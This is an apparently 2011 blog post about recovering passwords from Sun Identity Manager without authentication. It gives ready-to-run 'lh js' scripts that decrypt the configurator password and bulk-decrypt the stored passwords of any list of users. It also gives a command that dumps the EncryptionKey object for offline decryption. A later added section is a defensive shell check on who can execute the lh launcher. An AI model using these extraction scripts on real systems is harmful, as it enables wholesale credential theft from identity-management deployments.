Extracting encrypted passwords from Sun Identity Manager

Posted: 2-Nov-2011 20:25

For my sins I am using Sun IDM.  And I was somewhat disappointed at how easy it is to extract any password from Sun IDM without needing any authentication.  As long as you have command line access to call the LH you can extract the configurator password.  Here are a few links I found on this topic.

http://www.darkedges.com/blog/?p=7
http://zerointechnologies.com/sun-idm-decrypt-password.html

The second link includes the JavaScript code needed, but a session needs to be established first.  So this is the modified code I used.

/* Decrypt Sun IDM Passwords */
importPackage(Packages.com.waveset.util);
importPackage(Packages.com.waveset.server);
/* An internal session must exist before EncryptedData will decrypt anything */
var _lhSession = new InternalSession();
/* arguments[0] is the encrypted value exactly as stored in the repository */
print("Encrypted = " + arguments[0]);
var pwd = new EncryptedData();
pwd.fromString(arguments[0]);
print("Decrypted = " + pwd.decryptToString());
/* End */

Save the above script as pwd.js and call it as shown below:

./lh js pwd.js "3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw=="
Encrypted = 3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw==
Decrypted = configurator


So... to get the password you want, here is a modified version of the JS that takes an input file of user names (one per line) and returns the decrypted passwords:

/* Decrypt Sun IDM Passwords */
importPackage(Packages.java.util);
importPackage(Packages.java.io);
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
importPackage(Packages.com.waveset.util);
/* An internal session must exist before EncryptedData will decrypt anything */
var _lhSession = new InternalSession();
/* arguments[0] is a text file with one IDM user name per line */
var file = new FileReader(arguments[0]);
var br = new BufferedReader(file);
var line;
while ((line = br.readLine()) != null) {
    /* Look the user up by name, then decrypt its stored password attribute */
    var obj = _lhSession.getObject(Type.USER, line);
    var pwd = new EncryptedData();
    pwd.fromString(obj.getAttribute("password"));
    print(obj.getName() + "," + pwd.decryptToString());
}
br.close();
/* End */

Plus I've now got the offline decryption working too by extracting out the encryption key:

$WSHOME/bin/lh console -c "getObject EncryptionKey *"

And the Misc data:

/* Extract Misc Data */
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
var _lhSession = new InternalSession();
/* Fetch the "miscData" object from the repository and dump it as XML */
var obj = _lhSession.getObject(Type.MISCELLANEOUS, "miscData");
print("Result = " + obj.toXml());
/* End */

Then call the JavaScript:

$WSHOME/bin/lh js misc.js

Using the code shown above from Dark Edges.
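Every step above, the pwd.js and misc.js scripts and the lh console call alike, needs nothing more than the ability to execute $WSHOME/bin/lh as some OS user, so the one thing worth checking on a box like this is who can run it. The check below is an addition to this post, not code from the original or from Sun: it reports whether an lh launcher is executable by its group or by everyone. It assumes lh should be runnable only by its owner (the IDM service account, an assumption) and that ls -ld prints the usual ten-character mode string; the default path $WSHOME/bin/lh is the one used in the commands above.

```shell
#!/bin/sh
# Added example, not from the original post: flag an lh launcher that
# anyone other than its owner can execute.
# Assumption: only the owning IDM service account should be able to run lh.

# lh_mode PATH -> prints the 10-character mode string, e.g. -rwxr-x---
lh_mode() {
    ls -ld "$1" | cut -c1-10
}

# lh_exposed PATH -> exit 0 if group or other has an execute bit,
#                    1 if only the owner does, 2 if PATH does not exist
lh_exposed() {
    [ -e "$1" ] || return 2
    mode=$(lh_mode "$1")
    # char 7 is the group execute bit (x, or s for setgid),
    # char 10 is the other execute bit (x, or t for sticky)
    gx=$(printf '%s\n' "$mode" | cut -c7)
    ox=$(printf '%s\n' "$mode" | cut -c10)
    case "$gx" in x|s) return 0 ;; esac
    case "$ox" in x|t) return 0 ;; esac
    return 1
}

# lh_report PATH -> human-readable verdict; exit code mirrors lh_exposed
lh_report() {
    path="$1"
    if [ ! -e "$path" ]; then
        echo "no lh launcher found at $path"
        return 2
    fi
    if lh_exposed "$path"; then
        echo "EXPOSED: $path is $(lh_mode "$path"); group/other can run lh"
        return 0
    fi
    echo "ok: $path is $(lh_mode "$path"); only the owner can run lh"
    return 1
}

# Usage: sh lh_check.sh [/path/to/lh]   (defaults to $WSHOME/bin/lh when WSHOME is set)
if [ -n "${1:-}" ] || [ -n "${WSHOME:-}" ]; then
    lh_report "${1:-$WSHOME/bin/lh}" || true
fi
```

Run it with WSHOME set, or pass the path explicitly. It answers only the question this post hinges on, who can invoke lh; it says nothing about the repository database credentials or the EncryptionKey object, which are separate things to lock down.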

Sad.. But true.
Posted by BarTender (Wellington, New Zealand)